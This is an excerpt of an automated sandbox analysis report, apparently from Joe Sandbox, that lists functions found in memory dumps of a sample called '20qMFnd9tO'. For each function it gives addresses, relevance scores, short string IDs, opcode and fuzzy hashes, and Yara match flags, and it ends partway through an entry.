                                              • Instruction ID: 407012e57a5199d4112012758207a51a6dca81683574af66b693bd36fa536dc0
                                              • Opcode Fuzzy Hash: 59b65dd590fb0ee88e50e23c03c0ad093372e6083e92c6d488c3e8e64a7c0231
                                              • Instruction Fuzzy Hash: 0B1119756083819BE704DF28C894B2EBBF4FB89708F040A6CE5D1AB291D3759905CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004110A3 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: |~S$-+
                                              • API String ID: 0-3866320884
                                              • Opcode ID: 59b65dd590fb0ee88e50e23c03c0ad093372e6083e92c6d488c3e8e64a7c0231
                                              • Instruction ID: bde9f70d436c2653ec9b2887bdb5759d28c9c550c641e4ac4189ad47fd9054ad
                                              • Opcode Fuzzy Hash: 59b65dd590fb0ee88e50e23c03c0ad093372e6083e92c6d488c3e8e64a7c0231
                                              • Instruction Fuzzy Hash: 831119716083819BE304DF28C895B6FFBF4FB89708F040A5DE1D1A7291D3B59945CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007042B3 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: a89ece60f64e6984b3f2ce08bdcc9e757be0a3dcd153559bc209b51517d7e94b
                                              • Instruction ID: fa8299df2987f613b8b9e60aa1fe25f0b636f09ad86804daaf63a051b60d0203
                                              • Opcode Fuzzy Hash: a89ece60f64e6984b3f2ce08bdcc9e757be0a3dcd153559bc209b51517d7e94b
                                              • Instruction Fuzzy Hash: 42E1ADB0544B42CBD329CF29C4947A3BBE1BF56308F148A6DD5EB8B6C2D739A409CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0042404C Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: a89ece60f64e6984b3f2ce08bdcc9e757be0a3dcd153559bc209b51517d7e94b
                                              • Instruction ID: 1b11cb7366a6958057bd4847e473d56c80a6e1bc79015c5dddc2634ae9bdb4fd
                                              • Opcode Fuzzy Hash: a89ece60f64e6984b3f2ce08bdcc9e757be0a3dcd153559bc209b51517d7e94b
                                              • Instruction Fuzzy Hash: E7E1D270204B528BD325CF25D0947A3BBE1FF96304F548A6EC4EB8B782D738A409CB59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00700E61 Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .0.+
                                              • API String ID: 0-3799585517
                                              • Opcode ID: a6d6bb5fac2bd3e60ccac78776ac3fe56e61f918bbd8e56eb57ab2c2a9fb3842
                                              • Instruction ID: a004e386ca06e5159ab00d0ea54407004fd1d6f86dfe25498ab092463a78a3bc
                                              • Opcode Fuzzy Hash: a6d6bb5fac2bd3e60ccac78776ac3fe56e61f918bbd8e56eb57ab2c2a9fb3842
                                              • Instruction Fuzzy Hash: 67D19AB0504B818BD734CF28C491B67BBE2AF96314F448B1DD1AB4BA92D735F409CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00420BFA Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .0.+
                                              • API String ID: 0-3799585517
                                              • Opcode ID: cacb883c933ae60ffc7aef8df3b6052d70d3f467bcf6bb378c048a6e3f8865fb
                                              • Instruction ID: 96844d172bebe234a6a0f9a0c00553cad096d01050311b8ba89ef55bd8226227
                                              • Opcode Fuzzy Hash: cacb883c933ae60ffc7aef8df3b6052d70d3f467bcf6bb378c048a6e3f8865fb
                                              • Instruction Fuzzy Hash: 01D1CAB0604B408BD734CF29D581753BBE2AF59304F448A5ED5AA4BB93D738F409CBA9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070429F Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: 76ceaf3c719947b641cbfe16e38780b0141b372ba638a0cccb74e34b08252ebf
                                              • Instruction ID: ac8f2d0656ca91ed9d85fd3c89e00771dab8a15bc89fbcb06466e7c437b29732
                                              • Opcode Fuzzy Hash: 76ceaf3c719947b641cbfe16e38780b0141b372ba638a0cccb74e34b08252ebf
                                              • Instruction Fuzzy Hash: 74C1AFB4144B82CBD725CF25C4947B3BBE1BF66308F188A6DC5EA8B2C2D7396409CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00424038 Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: 76ceaf3c719947b641cbfe16e38780b0141b372ba638a0cccb74e34b08252ebf
                                              • Instruction ID: 79829f1e78c1595f969f0cb61c9688e62c451f2e67c119cf8773ad09b961162b
                                              • Opcode Fuzzy Hash: 76ceaf3c719947b641cbfe16e38780b0141b372ba638a0cccb74e34b08252ebf
                                              • Instruction Fuzzy Hash: 9CC1B074244B628BD725CF25D0947B3BBE1FF96304F98496EC4EA8B382D7386409CB59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F740C Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 65
                                              • API String ID: 0-2658551721
                                              • Opcode ID: c1de6a7053fa2261784068ca241dbd61f0b5c86584a4289f361b392f2267aa12
                                              • Instruction ID: e1ca87c20fb0a30dbc0292488b0e96ee6ec95a02c46f2f8e4f7fa1cc9f7d97a9
                                              • Opcode Fuzzy Hash: c1de6a7053fa2261784068ca241dbd61f0b5c86584a4289f361b392f2267aa12
                                              • Instruction Fuzzy Hash: 43C131B110C3418BD704DF54C991BABBBE2EF85748F148A1CF4959B391D3B9CA0ACB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004171A5 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 65
                                              • API String ID: 0-2658551721
                                              • Opcode ID: f4f50b469c2c478f72087db8ebc27f0a5900ee9bd5966eeb3e3576eac61342ec
                                              • Instruction ID: c78c7d737539c175f9f43a6a94184915111c47ecdb6749dee5be0f7138f54583
                                              • Opcode Fuzzy Hash: f4f50b469c2c478f72087db8ebc27f0a5900ee9bd5966eeb3e3576eac61342ec
                                              • Instruction Fuzzy Hash: 92C12FB01083419BD714CF54C69179BBBF2EF85748F548A1DF4959B382D3B8CA4A8B8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406BF0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,
                                              • API String ID: 0-3772416878
                                              • Opcode ID: 82069c0b5c0476b2a06d1b5b7756eb66033943ac0d407974bc526bbb431b8379
                                              • Instruction ID: bb70358051e8e164d5269611654ad2c0e6227f380b66c1e0d894ef4aa5420d39
                                              • Opcode Fuzzy Hash: 82069c0b5c0476b2a06d1b5b7756eb66033943ac0d407974bc526bbb431b8379
                                              • Instruction Fuzzy Hash: 8CB12A7110D3819FD314CF68D44465BBBE0AFA9308F444A6EF4D997382D375EA28CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00702663 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: SFG[
                                              • API String ID: 0-3479887772
                                              • Opcode ID: 03a1f31414b47f779a62c2eece54325c7d713ededc8376c5ee700f39634a8dac
                                              • Instruction ID: 1ff8cfc58a9b705acbd95fd9abffb09f79b3f58365803922c244e3e03166dfb4
                                              • Opcode Fuzzy Hash: 03a1f31414b47f779a62c2eece54325c7d713ededc8376c5ee700f39634a8dac
                                              • Instruction Fuzzy Hash: 52611E75105F808BD7758B24C8A47E3BBE1BB1230AF54599CD0EBCB286DB39A44ACF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004223FC Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SFG[
                                              • API String ID: 0-3479887772
                                              • Opcode ID: 03a1f31414b47f779a62c2eece54325c7d713ededc8376c5ee700f39634a8dac
                                              • Instruction ID: d4117b83f07e7488b8501e86dc40138e9844957d6a36523e78829fe77b4dbd49
                                              • Opcode Fuzzy Hash: 03a1f31414b47f779a62c2eece54325c7d713ededc8376c5ee700f39634a8dac
                                              • Instruction Fuzzy Hash: 12612D70104F918BD7258F24C9647E3BBE1BB1630AF54499DC0EA8B286DB79A44ACF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007025BC Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: SFG[
                                              • API String ID: 0-3479887772
                                              • Opcode ID: 378031af5d3c1c0f3fbba72c5c13e5de39e1c4510b866d944f5216f87c39c8f3
                                              • Instruction ID: cecae09aad38869933d78bc97ff5ccba2ef954ab3160ad60367b36d7a80eb735
                                              • Opcode Fuzzy Hash: 378031af5d3c1c0f3fbba72c5c13e5de39e1c4510b866d944f5216f87c39c8f3
                                              • Instruction Fuzzy Hash: 66610A75104F808BD7758F28C8A47E3BBE1BB1230AF54599CD0EB8B282DB39644ACF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00422355 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SFG[
                                              • API String ID: 0-3479887772
                                              • Opcode ID: 378031af5d3c1c0f3fbba72c5c13e5de39e1c4510b866d944f5216f87c39c8f3
                                              • Instruction ID: 70f26544dc9071be0236e57dd0204c07e2efdfb7cee7a65ee0b4338dfb663f59
                                              • Opcode Fuzzy Hash: 378031af5d3c1c0f3fbba72c5c13e5de39e1c4510b866d944f5216f87c39c8f3
                                              • Instruction Fuzzy Hash: F6612A70104F908BD725CF28C9A47E3BBE1BB1630AF54599DC0EA8B282DB79644ACF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F4C07 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 8+G
                                              • API String ID: 0-1274102880
                                              • Opcode ID: abfea8181e11095583cbf7f0b7d89978a325d8ae7042c2b862e196e48cbaa853
                                              • Instruction ID: f0b27b6220cbe2700c0518e79beaa392cb0d351c26fa7de675547c5fba5cbd70
                                              • Opcode Fuzzy Hash: abfea8181e11095583cbf7f0b7d89978a325d8ae7042c2b862e196e48cbaa853
                                              • Instruction Fuzzy Hash: D961F8B45017428BE324CF15C4A4757FBF2BF46314F149A9CC49A8BB66C779E886CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004149A0 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8+G
                                              • API String ID: 0-1274102880
                                              • Opcode ID: abfea8181e11095583cbf7f0b7d89978a325d8ae7042c2b862e196e48cbaa853
                                              • Instruction ID: 7f1984d2afc2b63a938a454ccc11125ac0303f15c4585a077d1dd3c09e81dc68
                                              • Opcode Fuzzy Hash: abfea8181e11095583cbf7f0b7d89978a325d8ae7042c2b862e196e48cbaa853
                                              • Instruction Fuzzy Hash: F861E5B45007028BE324CF15C4A4B56FBF1BF86304F148A9CD49A8BBA6C779E8C5CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070258F Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: SFG[
                                              • API String ID: 0-3479887772
                                              • Opcode ID: dcddd1137bdc83a316e86c32be531708ab2b33dbf66328a73f8a9c03c9486edf
                                              • Instruction ID: 7f3599a8e10fbc50683800653071ae9a2279217419a627cc91f091e1d6633e8c
                                              • Opcode Fuzzy Hash: dcddd1137bdc83a316e86c32be531708ab2b33dbf66328a73f8a9c03c9486edf
                                              • Instruction Fuzzy Hash: AA512A75104F808AD775CF28C8647E3BBE1BB1630AF54599CD0EB8B286DB39A44ACF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00422328 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SFG[
                                              • API String ID: 0-3479887772
                                              • Opcode ID: dcddd1137bdc83a316e86c32be531708ab2b33dbf66328a73f8a9c03c9486edf
                                              • Instruction ID: ad05c10627ddb96e8645ff28215dc05e6223569a8dd6cfc96fc1bd1b85800c84
                                              • Opcode Fuzzy Hash: dcddd1137bdc83a316e86c32be531708ab2b33dbf66328a73f8a9c03c9486edf
                                              • Instruction Fuzzy Hash: 3B514C70104F918AD735CF28C9647E3BBE1BB1634AF44499DC0EA8B286DB79A44ACF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E8247 Relevance: .8, Instructions: 820COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 386a9c81ba28c8640e6e93a1afa99e4e56672440142d6cc9d296ad02214f9220
                                              • Instruction ID: cf49ef0bb708461044300f1133c3ae52042381e0571fed86d875fff6375b464d
                                              • Opcode Fuzzy Hash: 386a9c81ba28c8640e6e93a1afa99e4e56672440142d6cc9d296ad02214f9220
                                              • Instruction Fuzzy Hash: 6052F2315097518FC725DF19D8802BAB3E2FFC4314F298A2DD8DA97385DB35A952CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00407FE0 Relevance: .8, Instructions: 820COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 386a9c81ba28c8640e6e93a1afa99e4e56672440142d6cc9d296ad02214f9220
                                              • Instruction ID: 3c4da5bc503f4646444de1ba78304ed219537e3d83d73f658468d4530c432190
                                              • Opcode Fuzzy Hash: 386a9c81ba28c8640e6e93a1afa99e4e56672440142d6cc9d296ad02214f9220
                                              • Instruction Fuzzy Hash: 7E52B2315087118BC725DF18D98027AB3E1FFC4314F198A3ED9D6A7385DB39A951CB8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E39A7 Relevance: .6, Instructions: 648COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6028580f01eda7659e3ff52b26b7c19e214034c6d1cc909921eb8a35e6596425
                                              • Instruction ID: d0b9cd69aac9d922cdacfacfbf98b6fb86b9930c0b700c05b0afd1e8c2166dfc
                                              • Opcode Fuzzy Hash: 6028580f01eda7659e3ff52b26b7c19e214034c6d1cc909921eb8a35e6596425
                                              • Instruction Fuzzy Hash: 1F5214309097969FC714CF2AC0846A6FBF2FF84304F18866DE89987742D735EA59CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403740 Relevance: .6, Instructions: 648COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6028580f01eda7659e3ff52b26b7c19e214034c6d1cc909921eb8a35e6596425
                                              • Instruction ID: f0b27f3d88e0b4ed0c2ccbdc9b7b5a09e35b08bd7231fd1e15c89dd13ee65ad2
                                              • Opcode Fuzzy Hash: 6028580f01eda7659e3ff52b26b7c19e214034c6d1cc909921eb8a35e6596425
                                              • Instruction Fuzzy Hash: 8552DD715087529FC314CF29C0806A6FBE5FF84315F18867EE899A7782D338EA55CB89
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E4347 Relevance: .6, Instructions: 613COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 023078430bd3f63c9485060c2ba0b6db30fd77274b9e7b210b70069523a738f4
                                              • Instruction ID: bf366a8c9ef170a93aef01897760bdc7126154d066d2b5932c017df32ff8dae1
                                              • Opcode Fuzzy Hash: 023078430bd3f63c9485060c2ba0b6db30fd77274b9e7b210b70069523a738f4
                                              • Instruction Fuzzy Hash: 57424470516B918FC728CF3AC59066ABBE2FF85310B608A2DD5978BB90DB35F845CB14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004040E0 Relevance: .6, Instructions: 613COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd4d37c8821ba602dd0d468d10fd3559c307da4bdd5324c36c66590636f7bade
                                              • Instruction ID: 496568c904df0e142e1ab7dda159f3e39124be786271467eac50f0fca732a977
                                              • Opcode Fuzzy Hash: fd4d37c8821ba602dd0d468d10fd3559c307da4bdd5324c36c66590636f7bade
                                              • Instruction Fuzzy Hash: AB4258B0614B518FC368CF28C59066ABBF1FF95310B508A2ED6979BB90D739F845CB18
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E6757 Relevance: .6, Instructions: 587COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ea737905465ddc652c6aeccca46bd096e3dd572e0b56af5f09eda6e2085b6ad
                                              • Instruction ID: 50038504256a70352a07aaaf8ab6e30f970cb4ae1f03acc1b517c72cf5790662
                                              • Opcode Fuzzy Hash: 9ea737905465ddc652c6aeccca46bd096e3dd572e0b56af5f09eda6e2085b6ad
                                              • Instruction Fuzzy Hash: F422F6366093418FC718CF29C88166AFBE7EFD8304F188A6DF9988B352D674D845CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004064F0 Relevance: .6, Instructions: 587COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 95baa4d1db46c6ceae147ac2a9e876a4416fef2c91cee2cd5cd94b7a71b616e5
                                              • Instruction ID: 24d730f72d150e6dacaea7cf74630cf46d7c8519f3687183044a12078167685f
                                              • Opcode Fuzzy Hash: 95baa4d1db46c6ceae147ac2a9e876a4416fef2c91cee2cd5cd94b7a71b616e5
                                              • Instruction Fuzzy Hash: 7222F9766083018FC314CF18C88166AFBE6EFC9314F09CA7DE9959B391D678D855CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070167F Relevance: .3, Instructions: 278COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1daf7efffed0e9b4aec9e8e48b685997638138f1f82147ce4ba1fe85f7a62fa
                                              • Instruction ID: 17cd497e08e258520f8ff9683bd8e5cba0307c8d354ff1e24058574ee4344446
                                              • Opcode Fuzzy Hash: e1daf7efffed0e9b4aec9e8e48b685997638138f1f82147ce4ba1fe85f7a62fa
                                              • Instruction Fuzzy Hash: 329146B0200B518BD324CF25C861B63B7F2FF56314F444A5CD49B8BBA5E779A945CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00421418 Relevance: .3, Instructions: 278COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8017560ef1501c4bc5d4a1058e6e6d3965e86ba04c2207220b683d2ec90757f3
                                              • Instruction ID: 96038381f169189e0ba6c2e199cb6ed615afb70317f0e9505d95fa2997ba7923
